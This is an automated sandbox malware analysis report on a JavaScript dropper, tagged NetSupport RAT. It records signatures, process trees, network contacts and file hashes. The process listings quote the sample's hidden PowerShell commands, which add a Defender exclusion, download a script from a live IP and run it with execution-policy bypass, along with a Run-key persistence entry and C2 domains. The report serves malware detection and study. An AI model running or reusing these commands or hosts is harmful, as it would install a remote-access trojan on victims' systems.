Malware Analysis Report

2025-06-16 05:06

Sample ID 230527-kwgllabd27
Target 02303299.js
SHA256 64339638d9234ab1efe25fe180b3097a6614687c8f83b1cc0c5a1dde570aaf81
Tags
netsupport persistence rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

64339638d9234ab1efe25fe180b3097a6614687c8f83b1cc0c5a1dde570aaf81

Threat Level: Known bad

The file 02303299.js was found to be: Known bad.

Malicious Activity Summary

netsupport persistence rat

Process spawned unexpected child process

NetSupport

Blocklisted process makes network request

Executes dropped EXE

Checks computer location settings

Loads dropped DLL

Adds Run key to start application

Drops file in System32 directory

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Opens file in notepad (likely ransom note)

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-05-27 08:56

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-05-27 08:56

Reported

2023-05-27 08:59

Platform

win7-20230220-en

Max time kernel

30s

Max time network

34s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\02303299.js

Signatures

Process spawned unexpected child process

Description: Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process
Indicator: N/A
Process: C:\Windows\system32\cmd.exe

Description: Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process
Indicator: N/A
Process: C:\Windows\system32\cmd.exe

Blocklisted process makes network request

Description: N/A
Indicator: N/A
Process: C:\Windows\system32\wscript.exe
Target: N/A

Drops file in System32 directory

Description: File opened for modification
Indicator: C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Target: N/A

Enumerates physical storage devices

Opens file in notepad (likely ransom note)

ransomware
Description: N/A
Indicator: N/A
Process: C:\Windows\system32\NOTEPAD.EXE
Target: N/A

Suspicious behavior: EnumeratesProcesses

Description: N/A
Indicator: N/A
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Target: N/A

Suspicious use of AdjustPrivilegeToken

Description: Token: SeDebugPrivilege
Indicator: N/A
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Target: N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\02303299.js

C:\Windows\system32\cmd.exe

cmd /c start /MIN C:\ProgramData\BLD.bat

C:\Windows\system32\cmd.exe

cmd /c start C:\ProgramData\zayavka2.txt

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K C:\ProgramData\BLD.bat

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell.exe -WindowStyle hidden "Add-MpPreference -ExclusionExtension "Start-Sleep -Seconds 3;"Invoke-WebRequest 'http://188.227.59.169/zayavka/1.yay' -OutFile 'C:\ProgramData\archive.ps1'";

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\ProgramData\zayavka2.txt

Network

Country Destination Domain Proto
US 188.227.59.169:80 188.227.59.169 tcp

Files

C:\ProgramData\BLD.bat

MD5 018d63793042f588a85968475d98decf
SHA1 2c4f9a0bd490c2b53976adf08805dcc92fac349a
SHA256 afa8d3929a2809a91ffaa775fcc953b293e52b8accce3cd24c843cb0abbd13d0
SHA512 ee91d2218f6ac4d763858c8be3cc7ee23660de14e8dd6aea2a4a40b45a5aa6c3337ac13a366db52aab796f04058e2ec92ec81dec6c3cb93d4c310f59a6f9f98a

C:\ProgramData\zayavka2.txt

MD5 6cea5f86700d707b53b8f4a67d1ccf29
SHA1 37e53dd35cbf58bd9c3b7ba0bbd7be81fcb9fe54
SHA256 6e9ba5a17bb1ee71c64337b4cd794336eaed26e79d5e2eba6c31018bc9103c70
SHA512 d836c1624995dd93462fa462ec83c5c150189c0e7b2c0c9eeb923c7b7aec40aa91e27f10ac7b5a4dc8e78c2dc8df121c97022e9b8fbdaf0d5c93f59a0e535c29

memory/1652-71-0x0000000002520000-0x00000000025A0000-memory.dmp

memory/1652-72-0x000000001B1D0000-0x000000001B4B2000-memory.dmp

memory/1652-73-0x0000000002390000-0x0000000002398000-memory.dmp

memory/1652-75-0x000000000252B000-0x0000000002562000-memory.dmp

memory/1652-74-0x0000000002524000-0x0000000002527000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-05-27 08:56

Reported

2023-05-27 08:59

Platform

win10v2004-20230220-en

Max time kernel

143s

Max time network

153s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\02303299.js

Signatures

NetSupport

rat netsupport

Process spawned unexpected child process

Description: Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process
Indicator: N/A
Process: C:\Windows\system32\cmd.exe

Description: Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process
Indicator: N/A
Process: C:\Windows\system32\cmd.exe

Blocklisted process makes network request

Description: N/A
Indicator: N/A
Process: C:\Windows\system32\wscript.exe
Target: N/A

Description: N/A
Indicator: N/A
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Target: N/A

Checks computer location settings

Description: Key value queried
Indicator: \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation
Process: C:\Windows\system32\cmd.exe
Target: N/A

Executes dropped EXE

Description: N/A
Indicator: N/A
Process: C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\client32.exe
Target: N/A

Adds Run key to start application

persistence
Description: Set value (str)
Indicator: \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VCRuntmeLib_1 = "C:\\Users\\Admin\\AppData\\Roaming\\VCRuntmeLib_1\\client32.exe"
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Target: N/A

Enumerates physical storage devices

Modifies registry class

Description: Key created
Indicator: \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings
Process: C:\Windows\system32\cmd.exe
Target: N/A

Opens file in notepad (likely ransom note)

ransomware
Description: N/A
Indicator: N/A
Process: C:\Windows\system32\NOTEPAD.EXE
Target: N/A

Suspicious use of AdjustPrivilegeToken

Description: Token: SeDebugPrivilege
Indicator: N/A
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Target: N/A

Description: Token: SeDebugPrivilege
Indicator: N/A
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Target: N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\02303299.js

C:\Windows\system32\cmd.exe

cmd /c start /MIN C:\ProgramData\BLD.bat

C:\Windows\system32\cmd.exe

cmd /c start C:\ProgramData\zayavka2.txt

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K C:\ProgramData\BLD.bat

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell.exe -WindowStyle hidden "Add-MpPreference -ExclusionExtension "Start-Sleep -Seconds 3;"Invoke-WebRequest 'http://188.227.59.169/zayavka/1.yay' -OutFile 'C:\ProgramData\archive.ps1'";

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\ProgramData\zayavka2.txt

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -nop -w hidden -ep bypass C:\ProgramData\archive.ps1

C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\client32.exe

"C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\client32.exe"

Network

Country Destination Domain Proto
US 188.227.59.169:80 188.227.59.169 tcp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 169.59.227.188.in-addr.arpa udp
US 188.227.59.169:80 188.227.59.169 tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 250.255.255.239.in-addr.arpa udp
US 8.8.8.8:53 golden-scalen.com udp
US 86.38.202.175:80 golden-scalen.com tcp
US 86.38.202.175:443 golden-scalen.com tcp
US 8.8.8.8:53 175.202.38.86.in-addr.arpa udp
US 8.8.8.8:53 xoomep1.com udp
NL 80.66.88.143:1935 xoomep1.com tcp
US 8.8.8.8:53 geo.netsupportsoftware.com udp
GB 51.142.119.24:80 geo.netsupportsoftware.com tcp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 143.88.66.80.in-addr.arpa udp
US 8.8.8.8:53 24.119.142.51.in-addr.arpa udp
US 40.125.122.176:443 tcp
US 40.125.122.176:443 tcp
US 8.8.8.8:53 63.13.109.52.in-addr.arpa udp
NL 87.248.202.1:80 tcp
US 40.125.122.176:443 tcp
NL 173.223.113.164:443 tcp
NL 173.223.113.131:80 tcp
US 204.79.197.203:80 tcp
US 40.125.122.176:443 tcp
US 40.125.122.176:443 tcp
US 40.125.122.176:443 tcp

Files

C:\ProgramData\BLD.bat

MD5 018d63793042f588a85968475d98decf
SHA1 2c4f9a0bd490c2b53976adf08805dcc92fac349a
SHA256 afa8d3929a2809a91ffaa775fcc953b293e52b8accce3cd24c843cb0abbd13d0
SHA512 ee91d2218f6ac4d763858c8be3cc7ee23660de14e8dd6aea2a4a40b45a5aa6c3337ac13a366db52aab796f04058e2ec92ec81dec6c3cb93d4c310f59a6f9f98a

C:\ProgramData\zayavka2.txt

MD5 6cea5f86700d707b53b8f4a67d1ccf29
SHA1 37e53dd35cbf58bd9c3b7ba0bbd7be81fcb9fe54
SHA256 6e9ba5a17bb1ee71c64337b4cd794336eaed26e79d5e2eba6c31018bc9103c70
SHA512 d836c1624995dd93462fa462ec83c5c150189c0e7b2c0c9eeb923c7b7aec40aa91e27f10ac7b5a4dc8e78c2dc8df121c97022e9b8fbdaf0d5c93f59a0e535c29

memory/3844-145-0x00000232237A0000-0x00000232237C2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xstt41or.rrw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3844-151-0x0000023223260000-0x0000023223270000-memory.dmp

memory/3844-146-0x0000023223260000-0x0000023223270000-memory.dmp

memory/3844-155-0x0000023223260000-0x0000023223270000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1 445bf1b07223a04f8a159581a3d37d630273010f
SHA256 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 02a1a26525c65a359d41483180eaa6f7
SHA1 c0e2578b92d20e925c1c87016d1a9fccee1ec56f
SHA256 d0ec351493bdbc6cb94990b162bb8be5b0217277cc55ae12aa3c7ea704cdbc6e
SHA512 d3271137241553f8316fcfc94dcf88c2887ee7bb0babddb4c1666fb5ae821a28425400299281422a4ebeb1f4c7369443b839d10f182279504bbba5f2f1cd94c2

C:\ProgramData\archive.ps1

MD5 50dc5faa02227c0aefa8b54c8e5b2b0d
SHA1 27fe39b6b053685d4c781a7fa809840ebaab15d7
SHA256 aafc02e9f9c6ce1e9ff7aff753e5656d3d26041e06b78a9fd60ca6fe5127e09b
SHA512 5bb8701fa6b026e99a8f269b89660ee8abba7c88a654f756d455a13e418a29c75e1742278046985bcc599151f0838591ef58ae8f742016153e43c8c5a78da442

memory/4976-168-0x0000020DF8C70000-0x0000020DF8C7A000-memory.dmp

memory/4976-169-0x0000020DF8CF0000-0x0000020DF8D00000-memory.dmp

memory/4976-170-0x0000020DF9AB0000-0x0000020DF9AC4000-memory.dmp

memory/4976-171-0x0000020DF9AF0000-0x0000020DF9B02000-memory.dmp

C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\client32.exe

MD5 c4f1b50e3111d29774f7525039ff7086
SHA1 57539c95cba0986ec8df0fcdea433e7c71b724c6
SHA256 18df68d1581c11130c139fa52abb74dfd098a9af698a250645d6a4a65efcbf2d
SHA512 005db65cedaaccc85525fb3cdab090054bb0bb9cc8c37f8210ec060f490c64945a682b5dd5d00a68ac2b8c58894b6e7d938acaa1130c1cc5667e206d38b942c5

C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\PCICL32.DLL

MD5 00587238d16012152c2e951a087f2cc9
SHA1 c4e27a43075ce993ff6bb033360af386b2fc58ff
SHA256 63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8
SHA512 637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226

C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\pcicapi.dll

MD5 dcde2248d19c778a41aa165866dd52d0
SHA1 7ec84be84fe23f0b0093b647538737e1f19ebb03
SHA256 9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917
SHA512 c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\PCICHEK.DLL

MD5 a0b9388c5f18e27266a31f8c5765b263
SHA1 906f7e94f841d464d4da144f7c858fa2160e36db
SHA256 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a
SHA512 6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\msvcr100.dll

MD5 0e37fbfa79d349d672456923ec5fbbe3
SHA1 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA256 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA512 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

memory/3844-211-0x0000023223260000-0x0000023223270000-memory.dmp

C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\HTCTL32.DLL

MD5 2d3b207c8a48148296156e5725426c7f
SHA1 ad464eb7cf5c19c8a443ab5b590440b32dbc618f
SHA256 edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796
SHA512 55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c

memory/4768-220-0x00000000749C0000-0x00000000749CE000-memory.dmp